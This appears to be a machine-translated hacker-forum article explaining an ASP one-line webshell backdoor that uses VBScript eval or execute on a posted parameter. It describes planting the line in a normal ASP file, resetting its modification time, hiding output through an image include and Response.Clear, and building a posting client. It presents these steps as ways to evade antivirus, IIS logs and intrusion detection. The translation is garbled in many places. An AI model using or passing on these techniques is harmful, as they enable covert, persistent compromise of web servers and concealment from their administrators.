Analysis of ASP Trojan principles of eval edition: From jianke Villa

To be honest, I didn't understand it, but I took a look at it slowly (it's really ASP ). Haha

The technology of webshell prevention by administrators has also improved. In the past, the era of putting a webshell directly left us. Today, webshells are becoming more and more concealed. The hiding technology of webshell has also developed rapidly, from modifying the code case
The C/S model is the crystallization of the wisdom of the ox. When it comes to the C/S mode, does it remind you of the "execute request (" # ")" sentence under ASP?
Backdoor, haha. Today I will introduce you to an ASP one-sentence backdoor, but it is not execute, but another function-eval.
Well, let's talk about the principle and usage of the eval backdoor. I know that there is an execute function dedicated to ASP.
To execute ASP code. This is similar to the eval function in JavaScript. So execute can be used as
BACKDOOR: Execute request ("X "). However, when the post parameter X is null, the Execute function will fail, so you must add one
The sentence is wrong. Actually, VBScript also contains the eval function. I don't know if it can be used. Well, let's look at its function first:

Eval function
Calculates the value of an expression and returns the result.

[Result =] eval (expression)
Parameters
Result
Optional. Is a variable used to accept the returned results. If no result is specified, use the execute statement instead.

Expression
Required. It can be a string containing any valid VBScript expression.

TIPS:
In VBScript, x = y can be interpreted in two ways. The first method is to assign the value of Y to X. Second explanation
Is to test whether X and Y are equal. If they are equal, result is true; otherwise, result is false. The eval method always uses
And execute statements always use the first one.
Note that the expression parameter "can be a string containing any valid VBScript expression ". Well, that's not just a suggestion.
We can execute arbitrary code for eval. But looking at the description, Eval always interprets the value assignment statement as a sentence.
Assign values. Well, it doesn't matter. What if we use eval to execute and execute arbitrary code?
The eval backdoor was born!
Compared with execute, Eval has the advantage that when the parameter is null, no error occurs. So far, the shortest ASP backdoor is "". Count,
Is it shorter than before.
Insert the eval function into a normal ASP file, and your backdoor will be retained (it would be better if you can change the last modification time of the file back)
. Now you can execute any code. Of course, you need to post the code on the client.
It is very convenient for the client to use web pages. There is an eval client at the top of Haiyang, which seems to be using session to save the code and execute it. But I tried a few
I can't do it once. Alas, write it yourself.
The difference between the client and Haiyang is that it consists of different functions, each of which uses an HTM page, corresponding to a piece of code, placed in
The hidden domain of the webpage. Thanks for referring to the Web Page Structure of the micro ASP Backdoor client of the ice Fox prodigal son.
We didn't say that we had to execute with eval and then execute the code by execute. Therefore, the content class of the hidden domain
Similar to "execute (" response. Write ("" Hello, world! ""): Response. Write (""
"") "-- Note that double quotation marks are used in quotation marks, and the characters in execute can use carriage return or line breaks.
In place of carriage return.
This is not enough. We need to "chop the head to the end ". Split the header to clear the data before executing the backdoor code.
The end is to clear the data after the backdoor executes the Code, so that we cannot see the echo of other useless data.
Response. Clear and response. End are used respectively. OK. After some hacking, we can hide it.
The domain becomes: "resposne. Clear: Execute (" response. Write ("" Hello, world! ""): Response. Write (""
""): Response. End ")".
By the way, last year, not a cool man proposed to use the # I nclude image to hide the backdoor.
Is an ASP code. Didn't this mean that the method will display images instead of Echo after code execution? Actually, there is Echo.
You save the image and open it with the hexadecimal editing software. The original echo content is at the end of the image. Haha, think
Now, use response. Clear to clear the image and display the echo.
The task is to find the ASP backdoor code changes and then combine Javascript into HTML files.
If you are interested in the code, I will not go into details here. In addition, the Execute function can also use this client.
The advantage of this backdoor is its small size and high concealment. Anti-virus software cannot scan and kill all submitted data.
All are post methods, and IIS logs are not recorded. The disadvantage is that a large amount of data is transferred each time the code is executed, and the execution speed of the Code through execute is slower.
Another advantage of this code execution is that you can encrypt the post code and bypass IDs.